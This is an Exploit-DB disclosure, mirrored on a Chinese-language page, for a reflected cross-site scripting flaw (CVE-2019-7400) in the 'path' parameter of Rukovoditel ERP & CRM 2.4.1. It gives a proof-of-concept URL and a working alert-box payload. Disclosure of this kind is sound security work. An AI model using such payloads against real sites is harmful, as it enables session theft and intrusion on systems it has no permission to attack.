Rukovoditel ERP & CRM 2.4.1 – ‘path’ Cross-Site Scripting

  • 作者: Javier Olmedo
    日期: 2019-03-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46608/
  • # Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting
    # Exploit Author: Javier Olmedo
    # Website: https://hackpuntes.com
    # Date: 2019-03-24
    # Google Dork: N/A
    # Vendor: Rukovoditel
    # Software Link: https://sourceforge.net/projects/rukovoditel/
    # Affected Version: 2.4.1 and possibly before
    # Patched Version: patched in extension version 2.4.1
    # Category: Web Application
    # Platform: Windows
    # Tested on: Win10x64 & Kali Linux
    # CVE: 2019-7400
    # References:
    # https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
    
    # 1. Technical Description:
    # path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks
    # through a GET request in index.php resource.
    
    # 2. Proof Of Concept (PoC):
    # http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E
    
    # 3. Payload
    # "><img src=a onerror=alert("VULNERABLE")>